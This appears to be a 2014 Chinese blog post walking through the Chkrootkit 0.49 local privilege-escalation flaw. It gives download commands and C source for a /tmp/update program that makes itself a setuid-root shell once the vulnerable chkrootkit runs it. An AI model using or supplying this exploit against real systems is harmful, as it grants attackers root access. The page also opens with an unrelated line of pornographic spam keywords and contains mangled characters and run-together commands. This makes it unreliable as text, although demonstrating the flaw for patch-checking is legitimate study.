欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

安全漏洞:Chkrootkit 0.49 本地提權(quán)漏洞的測(cè)試方法

  發(fā)布時(shí)間:2014-09-29 15:34:12   作者:佚名   我要評(píng)論
這篇文章主要為大家介紹了查看自己的Chkrootkit 0.49安裝的是不是升到最新版了,或者下載有漏洞的版本進(jìn)行實(shí)驗(yàn),感興趣的朋友可以和腳本之家的小編一起來(lái)看一下

  Chkrootkit <=0.49 Local Root Vulnerability:小于等于0.49版的chrootkit本地提權(quán)漏洞。先來(lái)演示下吧:

  可以查看自己安裝的是不是升到最新版了,或者下載有漏洞的版本進(jìn)行實(shí)驗(yàn):

  wget wget http://www.exploit-db.com/wp-content/themes/exploit/applications/304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gztar vfxz 304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gzcd chkrootkit-0.49/

  ./chkrootkit -V

  普通用戶在 /tmp 目錄下新建 update.c(代碼實(shí)示例如下):

  #include <unistd.h>

  void main(void)

  {

  system("chown root:root /tmp/update");

  system("chmod 4755 /tmp/update");

  setuid(0);

  setgid(0);

  execl("/bin/sh","sh",NULL);

  }

  然后編譯好 update ,看下update的文件詳情:

  

  執(zhí)行有漏洞的 chkrootkit :

  

  再來(lái)看下 update 已經(jīng)成功屬于 root 組了!

  

  以上就是查看自己 Ckrootkit 0.49 是不是安裝的是不是升到最新版了,或者下載有漏洞的版本進(jìn)行實(shí)驗(yàn)的步驟,謝謝閱讀,希望能幫到大家,請(qǐng)繼續(xù)關(guān)注腳本之家,我們會(huì)努力分享更多優(yōu)秀的文章。

相關(guān)文章

最新評(píng)論